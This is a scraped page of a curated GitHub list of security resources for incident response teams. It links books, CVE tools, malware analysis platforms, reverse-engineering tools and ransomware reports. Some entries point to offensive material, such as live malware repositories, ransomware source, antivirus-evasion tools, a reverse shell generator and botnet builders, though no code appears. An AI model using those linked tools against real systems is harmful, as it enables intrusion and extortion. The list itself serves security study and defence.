awesome-csirt

CSIRT resource hub

A curated list of links and resources for security professionals to stay informed on CSIRT daily activities and security best practices.

Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

GitHub

467 stars
36 watching
85 forks
Language: C
last commit: about 2 months ago
awesomeawesome-listcsirtcveexfiltrationexploitsmalware-analysispentestingpocreverse-engineeringsecure-programmingsecuritythreat-intelligence

CSIRT / Books

here 467 about 2 months ago Nice list by
Practical Cryptography for Developers ,
The Book of Secret Knowledge 149,254 3 days ago
Security Engineering — Third Edition
The Cyber Plumber's Handbook
FIRST
Malware Analysis Resources
Cert.BR useful
7º Fórum Brasileiro de CSIRTs
9º Fórum Brasileiro de CSIRTs
Downloads SANS Pen-Testing Resources:
list 467 about 2 months ago Some of security projects
APT & CyberCriminal Campaign Collection 3,723 4 months ago
Encoding vs. Encryption vs. Hashing vs. Obfuscation
Shodan : is the world's first search engine for Internet-connected devices
CriminalIP : Criminal IP is a specialized Cyber Threat Intelligence (CTI) search engine that allows users to search for various security-related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
hacking-tutorials 326 over 3 years ago
crypto 512 12 months ago : Lecture notes for a course on cryptography
tink 13,499 7 months ago : Tink is a multi-language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse
SPLOITUS : Exploit search engine
Vulmon : Vulmon is a vulnerability search engine
CIS SecureSuite® Membership
CRYPTO101 : Crypto 101 is an introductory course on cryptography, freely available for programmers of all ages and skill levels
SMHasher 1,850 about 1 month ago is a test suite designed to test the distribution, collision, and performance properties of non-cryptographic hash functions
CPDoS : Cache Poisoned Denial of Service
cacao 28 10 months ago : OASIS CACAO TC: Official repository for work of the
cti-documentation 94 24 days ago
The 4th in the 5th: Temporal Aspects of Cyber Operations
SOCless :
Open CSIRT Foundation and
Global Forum on Cyber Expertise (GFCE)
Ten strategies of a world-class cybersecurity operations center
my-infosec-awesome 1,062 7 months ago
How to Secure Anything 9,941 over 1 year ago . How to systematically secure anything: a repository about security engineering
Metasploitable3 4,764 5 months ago : is a VM that is built from the ground up with a large amount of security vulnerabilities
Institute for Security and Technology : builds solutions to enhance the security of the global commons. Our goal is to provide the tools and insights needed for companies and governments to outpace emerging global security threats. Our non-traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions
NIST'S CYBERSECURITY FRAMEWORK
pluto-eris 33 over 3 years ago : Generator and supporting evidence for security of the Pluto/Eris half-pairing cycle of elliptic curves
cset 1,456 6 days ago : Cybersecurity Evaluation Tool by CISA.gov
comply 1,319 over 2 years ago : Compliance automation framework, focused on SOC2
Illustrated X.509 Certificate
Open Security Controls Assessment Language (OSCAL) 674 7 days ago : NIST is developing the Open Security Controls Assessment Language (OSCAL), a set of hierarchical, XML-, JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls
DWF : The DWF Identifiers dataset, distributed weakness filing
OASIS Common Security Advisory Framework (CSAF)
notrandom 71 over 2 years ago : reverse the Mersenne Twister
OpenEX : Crisis drills planning platform
NCSI : The National Cyber Security Index is a global index, which measures the preparedness of countries to prevent cyber threats and manage cyber incidents
THE EVOLUTION OF TRUST
Applying DevOps Principles in Incident Response
Pagerduty Incident Response : This documentation covers parts of the PagerDuty Incident Response process
security-training 411 over 1 year ago : Public version of PagerDuty's employee security training courses
incident-response-docs 1,022 about 1 year ago : PagerDuty's Incident Response Documentation
global-irt 64 11 months ago : Global IRT (Incident Response Team) is a project to describe common IRT and abuse contact information
atc-react 613 over 2 years ago : A knowledge base of actionable Incident Response techniques
Request Tracker for Incident Response
Request Tracker
Beagle 1,272 almost 2 years ago is an incident response and digital forensics tool which transforms security logs and data into graphs
CSIRT Schiltron: Training, Techniques, and Talent
Practical Tabletop Drills for CSIRTS - Pre-session Material
DFIRTrack 482 3 months ago : The Incident Response Tracking Application
FIR 1,734 23 days ago (Fast Incident Response): is an cybersecurity incident management platform designed with agility and speed in mind
Aurora Incident Response 766 about 1 year ago : Incident Response Documentation made easy. Developed by Incident Responders for Incident Responders
timesketch 2,615 14 days ago : Collaborative forensic timeline analysis
FastIR Collector Linux 173 almost 4 years ago (no longer maintained)
Critical Log Review Checklist for Security Incidents
Exercise in a Box
Incident response overview
How to Write and Execute Great Incident Response Playbooks
Incident Response: Windows Cheatsheet
Incident Response: Windows Account Logon and logon Events
Incident Response: Windows Account Management Event (Part 2)
Incident Response- Linux Cheatsheet
Building Better CSIRTs Using Behavioral Psychology
The features all Incident Response Plans need to have
Maltrail 6,535 5 days ago : Malicious traffic detection system
MD5 Decryption
SHA-1 is a Shambles : First Chosen-Prefix Collision on SHA-1 and Application to the PGP Web of Trust
Sha256 Algorithm Explained

CSIRT / CVEs

here 467 about 2 months ago Some CVEs stuff and links and in
MikroTik search on shodan
TROMMEL 6 over 6 years ago : Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
cve_manager 75 almost 3 years ago : A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database
dorkbot 512 4 months ago : Command-line tool to scan Google search results for vulnerabilities
NotQuite0DayFriday 794 over 2 years ago : This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly
Exploit Prediction Scoring System (EPSS) : The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts
CVE PoC 6,580 5 days ago : Almost every publicly available CVE PoC

CSIRT / Malware Analysis

Awesome Malware Analysis 11,989 6 months ago : A curated list of awesome malware analysis tools and resources
course Great online by
CS6038/CS5138 Malware Analysis, UC :
list 467 about 2 months ago Some other botnets
IKARUS anti.virus and its 9 exploitable kernel vulnerabilities
Digital Certificates Used by Malware
Signed Malware – The Dataset
Malware Sample Sources for Researchers
Indicators: Champing at the Cyberbit 266 about 4 years ago
Limon - Sandbox for Analyzing Linux Malwares 389 over 8 years ago
A Dynamic Binary Instrumentation framework based on LLVM 1,417 23 days ago
Framework for building Windows malware, written in C++ 504 almost 4 years ago
binary ninja
OSX/MaMi Analyzing a New macOS DNS Hijacker:
al-khaser 5,919 about 2 months ago A PoC "malware" application with good intentions that aims to stress your anti-malware system:
mal100.evad.spre.rans.spyw.troj.winEXE@34/9@31/10 Great analysis of
Chaos: a Stolen Backdoor Rising Again
Malware Indicators of Compromise (IOCs) 10 over 1 year ago
Puszek 156 almost 7 years ago : Yet another LKM rootkit for Linux. It hooks syscall table
Joe Sandbox Cloud 63 7 months ago is a deep malware analysis platform which detects malicious files - API Wrapper
Cuckoo Sandbox : Automated Malware Analysis
CBG 4 about 5 years ago : Cuckoo Breeding Ground Hash Table
EternalGlue part two: A rebuilt NotPetya gets its first execution outside of the lab
Malware web and phishing investigation by Decent Security
A collection of tools for working with TrickBot 198 about 7 years ago
Forgot About Default Accounts? No Worries, GoScanSSH Didn’t
makin 732 over 5 years ago reveal anti-debugging and anti-VM tricks
TESSERACT: Eliminating Experimental Bias in Malware Classification across Space and Time
colental/byob: BYOB (Build Your Own Botnet) 8,989 27 days ago , another
Source Code for Exobot Android Banking Trojan Leaked Online
Ramnit’s Network of Proxy Servers
snake 217 over 1 year ago : a malware storage zoo
A malware analysis kit for the novice
malware-ioc 1,647 9 days ago : Indicators of Compromises (IOC) of our various investigations
pftriage 77 over 4 years ago : Python tool and library to help analyze files during malware triage and analysis
imaginaryC2 443 about 2 years ago : Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads
When a malware is more complex than the paper.
Vba2Graph 274 almost 3 years ago : Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents
malwoverview 2,967 9 days ago : Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples or a specific malware sample
Gh0st SECT CTF 2018 :: , More Smoked Leet Chicken
What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
Linux.Malware 2 almost 3 years ago : Additional Material for the Linux Malware Paper
PHP Malware Examination
Analysis of Linux.Haikai : inside the source code
Cylance vs. MBRKiller Wiper Malware
Deep Analysis of TrickBot New Module pwgrab
multiscanner 617 about 5 years ago : Modular file scanning/analysis framework
FCL 462 over 3 years ago : FCL (Fileless Command Lines) - Known command lines of fileless malicious executions
Mac malware combines EmPyre backdoor and XMRig miner
The Full Guide Understanding Fileless Malware Infections
'Injection' Without Injection
Analysis of Neutrino Bot Sample (dated 2018-08-27): In this post I analyze a Neutrino Bot sample
pafish 3,401 5 months ago : Pafish is a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do
Thunderstrike2 details : This is the annotated transcript of our DefCon 23 / BlackHat 2015 talk, which presented the full details of Thunderstrike 2, the first firmware worm for Apple's Macs that can spread via both software or Thunderbolt hardware accessories and writes itself to the boot flash on the system's motherboard
Malboxes : a Tool to Build Malware Analysis Virtual Machines,
Triton is the world’s most murderous malware, and it’s spreading
Cloak and Dagger — Mobile Malware Techniques Demystified
IceBox 558 over 2 years ago : Icebox is a Virtual Machine Introspection solution that enable you to stealthily trace and debug any process (kernel or user). It's based on project Winbagility

CSIRT / Malware Analysis / Malware Development:

Welcome to the Dark Side: Part 1
Welcome to the Dark Side: Part 2-1
Welcome to the Dark Side: Part 2-2
Welcome to the Dark Side: Part 3
Welcome to the Dark Side: Part 4

CSIRT / Malware Analysis

Command and Control via TCP Handshake
wdeQEksXgm Joel Sandbox Analysis Report
emotet :
Aleph 158 over 3 years ago : OpenSource /Malware Analysis Pipeline System
Aleph 2 almost 2 years ago : File Analysis Pipeline
Anti-VM Technique with MSAcpi_ThermalZoneTemperature ,
AMSI as a Service — Automating AV Evasion: AMSI, the “AntiMalware Scan Interface”, has been around for some time. In a broad sense, it’s a component of Windows 10 which allows applications to integrate with AV products, though most people know it for it’s ability to make file-less malware visible to AV engines
A collection of x64dbg scripts 500 5 months ago . Feel free to submit a pull request to add your script
CAPA 4,873 7 days ago : The FLARE team's open-source tool to identify capabilities in executable files
DRAKVUF Sandbox 1,061 25 days ago automated hypervisor-level malware analysis system
Unprotect : The about Malware Evasion Techniques
HiJackThis Fork v3 699 7 months ago : A free utility that finds malware, adware and other security threats
FRITZFROG : A NEW GENERATION OF PEER-TO-PEER BOTNETS
Tracking A Malware Campaign Through VT
speakeasy 1,515 7 months ago : Windows kernel and user mode emulation
malware analysis and machine learning
GhostDNSbusters : Illuminating GhostDNS Infrastructure
The Tetrade : Brazilian banking malware goes global
Is macOS under the biggest malware attack ever? : EvilQuest/ThiefQuest malware
Hybrid Analysis
Part 1: The Black-Box Approach Evading Static Machine Learning Malware Detection Models –
ember 946 4 months ago : The EMBER dataset is a collection of features from PE files that serve as a benchmark dataset for researchers
Complementar resources to follow the EHREM course by GoHacking (Malware Reverse Engineering) 2 about 4 years ago
Coldfire 934 8 months ago : Golang malware development library
pei 30 about 3 years ago , the PE Injector - Inject code on 32-bit and 64-bit PE executables
The Art Of Mac Malware: Analysis
Freki 422 10 months ago :  Malware analysis platform
Ten process injection techniques: A technical survey of common and trending process injection techniques
Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
malware_training_vol1 1,938 5 months ago : Materials for Windows Malware Analysis training (volume 1)
Go Assembly on the arm64
Exploit Kit still sharpens a sword
Pingback : Backdoor At The End Of The ICMP Tunnel
WinAPI-Tricks : Collection of various WINAPI tricks / features used or abused by Malware
pyWhat 6,651 about 1 year ago : Identify anything. pyWhat easily lets you identify emails, IP addresses, and more. Feed it a .pcap file or some text and it'll tell you what it is!
Transacted Hollowing 521 9 months ago : a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging
Cuckoo Sandbox Overview
Malvuln : Finding and exploiting vulnerable Malware
Machine Learning for Static Malware Analysis, with University College London
Malware Scarecrow 379 about 4 years ago
Vigilante malware rats out software pirates while blocking ThePirateBay
Necro Python bot adds new exploits and Tezos mining to its bag of tricks
Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth : The Mandiant Advanced Practices team recently discovered a new malware family we have named PRIVATELOG and its installer, STASHLOG
Made in China: OSX.ZuRu : trojanized apps spread malware, via sponsored search results
DBatLoader: Abusing Discord to Deliver Warzone RAT
Siloscape : First Known Malware Targeting Windows Containers to Compromise Cloud Environments
DRIDEX : Analysing API Obfuscation Through VEH
The Return of the Malwarebytes Crackme , : Writeup and scripts for the 2021 malwarebytes crackme
Corvus : is a dynamic analysis system for malware targeting Windows, Linux, Android and PDFs. Behavioral heuristics are also applied to identify suspicious activities exhibited by unknown programs
MalAPI.io maps Windows APIs to common techniques used by malware
Malicious Document Analysis: Example 1
APIVADS : A Novel Privacy-Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
A new secret stash for “fileless” malware
Qu1cksc0pe 1,320 8 days ago : All-in-One malware analysis tool

CSIRT / Malware Analysis / Web Malwares

Boa release is an experimental Javascript lexer, parser and compiler written in Rust
midrashim 41 about 3 years ago : x64 ELF infector written in Assembly
d0zer 206 about 1 year ago : Elf binary infector written in Go
New evasion techniques found in web skimmers
digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process . , , , ,

CSIRT / Malware Analysis / Malware Samples

Automated Malware Analysis Report for D6pnpvG2z7 Generated by Joe Sandbox
Mac Malware
virii 603 almost 3 years ago : Collection of ancient computer virus source codes
Detricking TrickBot Loader : TrickBot (TrickLoader) is a modular financial malware that first surfaced in October in 20161. Almost immediately researchers have noticed similarities with a credential-stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. ,
Analysis of Emotet v4
abuse.ch Feodo Tracker Botnet C2 IP Blocklist
simple_ransomware 8 over 5 years ago : this script isn't ransomware, it's just script collect all your system files and encrypt it, Can be considered it a simple ransomware
Mirai "Batkek"
FinFisher Filleted 🐟 , a triage of the FinSpy (macOS) malware
Ryuk’s Return
Ryuk Ransomware : Extensive Attack Infrastructure Revealed
Collaboration between FIN7 and the RYUK group, a Truesec Investigation
Android-Malware-Samples 38 over 7 years ago : Android Malware Samples
Architecture of a ransomware
TRAFFIC ANALYSIS EXERCISE - OMEGACAST
Malware Samples 1,478 10 months ago : Malware samples and other artifacts
After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
#Buer #BuerLoader
SoReL-20M 638 over 3 years ago : Sophos-ReversingLabs 20 million sample dataset
minizinh0-FUD 368 about 3 years ago : A Fully Undetectable Ransomware
Purple Fox Rootkit Now Propagates as a Worm
How to analyze mobile malware: a Cabassous/FluBot Case study
Malware Analysis of a Password Stealer : n this video we dive into the analysis of Poulight malware, which is a .net based password stealer
Guildma
Darkside RaaS in Linux version

CSIRT / Malware Analysis / Repos

A repository of LIVE malwares for your own joy and pleasure 11,317 6 months ago :
malware.one is a binary substring searchable malware catalog containing terabytes of malicious code
Beginner Malware Reversing Challenges , by MalwareTech
MalwareWorld : Check for Suspicious Domains and IPs. Repo: : System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
C2Matrix : The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
LOLBITS 214 almost 2 years ago : C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion
MalwareBazaar : is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers
What is MWDB Core? : Malware repository component for samples & static configuration with REST API interface
Malpedia : The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research

CSIRT / Malware Analysis / Ransomwares

Ransomware decryption tool 8 almost 7 years ago
Schroedinger’s Pet(ya)
Player 3 Has Entered the Game: Say Hello to 'WannaCry'
WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
Ransomware Overview
Analyzing GrandSoft Exploit Kit and
Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
hidden-tear 729 over 4 years ago : It's a ransomware-like file crypter sample which can be modified for specific purposes
Tracking REvil : This blog describes our efforts in tracking the REvil ransomware and its affiliates for the past six months. REvil has been around since 2019 and is one of the top variants of ransomware causing havoc at many organizations around the globe ever since. The KPN Security Research Team was able to acquire C2 sinkholes allowing for the tracking of infections across the globe
Sodinokibi (aka REvil) Ransomware
REvil Master Key for Kaseya Attack Posted to XSS
After the ransom was paid, the attackers even provided some bonus security advice!
Phirautee 117 over 4 years ago : A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares. Phirautee is written purely using PowerShell and does not require any third-party libraries. This tool steals the information, holds an organisation’s data to hostage for payments or permanently encrypts/deletes the organisation data
Sophisticated new Android malware marks the latest evolution of mobile ransomware
Raccine 944 about 1 year ago : A Simple Ransomware Vaccine
Genetic Analysis of CryptoWall Ransomware
Brazilian Justice Court Ransomware: Another piece in the Puzzle
A Ransomware has landed! @Embraer by SECRET
RANSOMWARE GUIDANCE AND RESOURCES
No More Ransom!
PYSA/Mespinoza Ransomware
PYSA Ransomware
Mespinoza Analysis — New ransomware variant targets France
Some #PYSA / #Mespinoza #Ransomware Samples
Cerber Ransomware
RansomEXX Trojan attacks Linux systems
FIN7 - Lizar client Interface version 2.0.4
Introducing COLT – Compromise to Leak Time
RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
Apostle Ransomware Analysis
From Wiper to Ransomware | The Evolution of Agrius
Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
Miscellaneous Malware RE 195 over 2 years ago
BlackMatter x64 Linux Variant | esxcli variant ,
Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
RansomExx Renner
RANSOMWHERE : Total tracked ransomware payments all time. Ransomwhere is the open, crowdsourced ransomware payment tracker. Browse and download ransomware payment data or help build our dataset by reporting ransomware demands you have received
BlackByteDecryptor 64 about 3 years ago : This is a decryptor for the ransomware BlackByte
Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus : We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware

CSIRT / Malware Analysis / Virus/Anti-Virus

Avast open-sources its machine-code decompiler
Morris worm 590 almost 4 years ago
make a process unkillable?! (windows 10)
Attack inception : Compromised supply chain within a supply chain poses new risks – Microsoft Secure
Curtis' Blog: Bypassing Next Gen AV During a Pentest
Inception 368 9 months ago : Provides In-memory compilation and reflective loading of C# apps for AV evasion
Invoke-NeutralizeAV 41 almost 6 years ago : Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting
BinariesThatDoesOtherStuff
Circlean 454 over 1 year ago : USB key cleaner
The ELF Virus Writing HOWTO
mcreator 146 over 4 years ago : Encoded Reverse Shell Generator With Techniques To Bypass AV's
metame 569 about 5 years ago : is a simple metamorphic code engine for
rustdsplit 35 over 4 years ago : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this
Virus Total API in Python 1 almost 4 years ago
VirusTotal CLI 836 3 months ago
rustdsplit 35 over 4 years ago : At some point, I learned about a method to perform a binary search on a file in order to identify its AV signature and change it to bypass signature-based AV. The tool I used back then is gone, so I wrote this
Antivirus Event Analysis Cheat Sheet v1.7.2
UglyEXe :
How to bypass Defender in a few easy steps
Engineering antivirus evasion
avcleaner 1,011 over 2 years ago : C/C++ source obfuscator for antivirus bypass
An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
VxSig 259 9 months ago : Automatically generate AV byte signatures from sets of similar binaries

CSIRT / Malware Analysis / Trojans/Loggers

IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
Turla : In and out of its unique Outlook backdoor
QMKhuehuebr 85 almost 6 years ago : Trying to hack into keyboards

CSIRT / Malware Analysis / Malware Articles and Sources

“VANILLA” malware : vanishing antiviruses by interleaving layers and layers of attacks
A Mix of Python & VBA in a Malicious Word Document
MalwareAnalysisForHedgehogs : Throw your bat cape over your spikes and get started with malware analysis and reverse engineering. I work as a malware analyst and like to share my knowledge
2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
EMOTET : EMOTET INFECTIONS WITH ZEUS PANDA BANKER AND TRICKBOT (GTAG: DEL34)
A MIPS-32 ELF non-resident virus with false disassembly , Made with love by S01den (@s01den)
Linux.Kropotkine.asm 15,853 about 1 month ago
A WILD KOBALOS APPEARS , Tricksy Linux malware goes after HPCs
List of victim organizations attacked by Ransomware gangs released on the DarkWeb

CSIRT / Reverse Engineering

Fundamentos de Engenharia Reversa (pt-br)
Reverse Engineer's Toolkit 4,834 7 months ago
Dangers of the Decompiler
RE guide for beginners: Methodology and tools
REDasm 1,570 26 days ago : Crossplatform, interactive, multiarchitecture disassembler
Reversing ARM Binaries
Programmer De-anonymization from Binary Executables 86 over 6 years ago
Reverse engineering WhatsApp Web 6,149 7 months ago
BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
Reverse Engineering for Beginners
VivienneVMM 781 about 4 years ago : VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor
Xori 724 almost 2 years ago : Custom disassembly framework
rattle 350 about 1 year ago : Rattle is an EVM binary static analysis framework designed to work on deployed smart contracts
starshipraider 144 about 1 month ago : High performance embedded systems debug/reverse engineering platform
GBA-IDA-Pseudo-Terminal 13 almost 5 years ago : IDAPython tools to aid with analysis, disassembly and data extraction using IDA python commands, tailored for the GBA architecture at some parts
binja-ipython 29 over 6 years ago : A plugin to integrate an IPython kernel into Binary Ninja
PySameSame 23 over 6 years ago : This is a python version of samesame repo to generate homograph strings
Reversing a Japanese Wireless SD Card From Zero to Code Execution
Practical-Reverse-Engineering-using-Radare2 107 almost 8 years ago : Training Materials of Practical Reverse Engineering using Radare2
Reverse engineering Go binaries using Radare 2 and Python
r2pipe for V 6 about 2 months ago : r2pipe for V
radare2-webui 94 3 months ago : webui repository for radare2

CSIRT / Reverse Engineering / IDA Pro:

idaemu 549 over 2 years ago : idaemu is an IDA Pro Plugin - use for emulating code in IDA Pro
lighthouse 2,255 4 months ago : Code Coverage Explorer for IDA Pro & Binary Ninja
IDAPro Cheat Sheet
Lumen 931 20 days ago : A private Lumina server for IDA Pro
EFISwissKnife 147 over 7 years ago : An IDA plugin to improve (U)EFI reversing
IDA Python
Tenet 1,326 about 1 year ago :
TLS callbacks
rename gamemaker handlers 2 about 3 years ago

CSIRT / Reverse Engineering / GDB:

pwndbg 7,629 8 days ago : Exploit Development and Reverse Engineering with GDB Made Easy
PEDA 5,899 4 months ago : Python Exploit Development Assistance for GDB
about gef . : GDB Enhanced Features for exploit devs & reversers
some things about gef
Controlling GDB
Low Level Visualization via Debuggers
Faster GDB Startup

CSIRT / Reverse Engineering / Frida:

Getting Started with Frida Tools
part 1 Frida hooking android : , , , and
fridump3 180 15 days ago : A universal memory dumper using Frida for Python 3
r2flutch 167 over 2 years ago : Tool to decrypt iOS apps using r2frida

CSIRT / Reverse Engineering / Immunity:

Immunity Debugger
mona site. : is a python script that can be used to automate and speed up specific searches while developing exploits (typically for the Windows platform). It runs on Immunity Debugger and WinDBG, and requires python 2.7. Although it runs in WinDBG x64, the majority of its features were written specifically for 32bit processes

CSIRT / Reverse Engineering

LIEF : Library to Instrument Executable Formats ( )
DEBIN : Predicting Debug Information in Stripped Binaries
Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
Manticore : Symbolic Execution Tool For Analysis Of Binaries And Smart Contracts. : Symbolic execution tool
Beam me up, CFG. : Earlier in 2018 while revisiting the Delay Import Table, I used dumpbin to check the Load Configuration data of a file and noticed new fields in it. And at the time of writing this, more fields were added! The first CFGuard caught my attention and I learned about Control Flow Guard, it is a new security feature. To put it simple, it protects the execution flow from redirection - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead
PBA - Analysis Tools 52 over 5 years ago : My own versions from the programs of the book "Practical Binary Analysis"
functrace 89 over 5 years ago : is a tool that helps to analyze a binary file with dynamic instrumentation using DynamoRIO
Signature-Base 2,484 8 days ago : signature-base is the signature database for my scanners LOKI and SPARK Core

CSIRT / Reverse Engineering / Signature-Base

Generic Anomalies 2,484 8 days ago : Detects an embedded executable in a non-executable file

CSIRT / Reverse Engineering

Virtuailor 1,270 over 3 years ago : IDAPython tool for C++ vtables reconstruction
Linux Reverse Engineering CTFs for Beginners
execution-trace-viewer 270 over 3 years ago : Tool for viewing and analyzing execution traces
Reverse Engineering of a Not-so-Secure IoT Device

CSIRT / Reverse Engineering / ELF

Python for Reverse Engineering 1 : ELF Binaries
The 101 of ELF files on Linux : Understanding and Analysis - Linux Audit
On ELF, Part 1
On ELF, Part 2

CSIRT / Reverse Engineering

Kaitai Struct : A new way to develop parsers for binary structures
findLoop 26 over 5 years ago : find possible encryption/decryption or compression/decompression code
Reverse Engineering 'A Link to the Past (GBA)' ep 1
wiggle : The concepting self hosted executable binary search engine
uncompyle6 3,796 6 days ago : A cross-version
Decompyle++ 3,361 about 1 month ago : C++ python bytecode disassembler and decompiler
bearparser 648 3 months ago
Reverse-engineering precision op amps from a 1969 analog computer
CPU Adventure – Unknown CPU Reversing : We reverse-engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
pev 3 over 1 year ago : pev is a full-featured, open source, multiplatform command line toolkit to work with PE (Portable Executables) binaries
Sourcetrail 14,937 almost 3 years ago : free and open-source cross-platform source explorer
Qiling Framework : Qiling Advanced Binary Emulation Framework

CSIRT / Reverse Engineering / Obfuscation/Deobfuscation:

batch_deobfuscator 145 about 2 years ago : Deobfuscate batch scripts obfuscated using string substitution and escape character techniques
Tales Of Binary Deobfuscation - Part 1
evilquest_deobfuscator 6 about 4 years ago : EvilQuest/ThiefQuest malware strings decrypter/deobfuscator. : Small utility to hash EvilQuest code and cstrings sections
Deobfuscating DanaBot’s API Hashing
XLMMacroDeobfuscator 572 7 months ago : Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
syntia 301 over 4 years ago : Program synthesis based deobfuscation framework for the USENIX 2017 paper "Syntia: Synthesizing the Semantics of Obfuscated Code"
Deobfuscation : recovering an OLLVM-protected program
Stadeo 147 about 3 years ago : Control-flow-flattening and string deobfuscator
Semi-Automatic Code Deobfuscation 71 over 3 years ago
msynth 281 6 months ago : Code deobfuscation framework to simplify Mixed Boolean-Arithmetic (MBA) expressions

CSIRT / Reverse Engineering

Glasgow Debug Tool 1,921 13 days ago : Scots Army Knife for electronics
windbglib 323 about 2 years ago : Public repository for windbglib, a wrapper around pykd.pyd (for Windbg), used by mona.py
VX Underground

CSIRT / Reverse Engineering / VX Underground

MalwareSourceCode 15,853 about 1 month ago : Collection of malware source code for a variety of platforms in an array of different programming languages
VXUG-Papers 1,146 almost 3 years ago : Research code & from members of vx-underground

CSIRT / Reverse Engineering

Como automaticamente atachar um processo a um debugger. (pt-br)
Taming Virtual Machine Based Code Protection
HyperDbg Debugger 2,927 5 days ago : The Source Code of HyperDbg Debugger
The HT Editor 411 over 1 year ago : A file editor/viewer/analyzer for executables
ImHex 45,125 15 days ago : A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM
playing with little endian
Finding memory bugs with AddressSanitizer
flare-floss 3,255 9 days ago : : FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware
#BazarBackdoor Group #CobaltStrike Payload
The Debugging Book : Tools and Techniques for Automated Software Debugging
Debugging System with DCI and Windbg . ,
SCAS/SCASB/SCASW/SCASD : Scan String, x86 Instruction Set Reference
dexcalibur 1,059 almost 2 years ago : Android reverse engineering tool focused on dynamic instrumentation automation leveraging Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform
Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
rr 9,192 4 days ago : Record and Replay Framework
panda 2,489 17 days ago : Platform for Architecture-Neutral Dynamic Analysis
qira 3,957 over 2 years ago : QEMU Interactive Runtime Analyser
qemu_blog 1,362 about 1 year ago : A series of posts about QEMU internals
Reverse engineering (Absolute) UEFI modules for beginners
miasm 3,495 3 months ago : Reverse engineering framework in Python
rehex 2,312 4 days ago : Reverse Engineers' Hex Editor
Bless 66 almost 6 years ago : Gtk# Hex Editor (fork)
Reverse Engineering the M6 Smart Fitness Bracelet
Reverse Engineering a Linux executable – hello world
rizin 2,711 4 days ago : UNIX-like reverse engineering framework and command-line toolset
reFlutter 1,294 over 2 years ago : Flutter Reverse Engineering Framework
OpenSecurityTraining2 : OpenSecurityTraining Inc. (EIN 86-1180701) is a 501c3 non-profit working to create the world's best cybersecurity training
Nightmare is an intro to binary exploitation / reverse engineering course based around ctf challenges
Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how
capa 4,873 7 days ago : The FLARE team's open-source tool to identify capabilities in executable files
aDLL 70 over 3 years ago Adventure of Dinamic Lynk Library: aDLL is a binary analysis tool focused on the automatic discovery of DLL Hijacking vulnerabilities. The tool analyzes the image of the binary loaded in memory to search for DLLs loaded at load-time and makes use of the Microsoft Detours library to intercept calls to the LoadLibrary/LoadLibraryEx functions to analyze the DLLs loaded at run-time
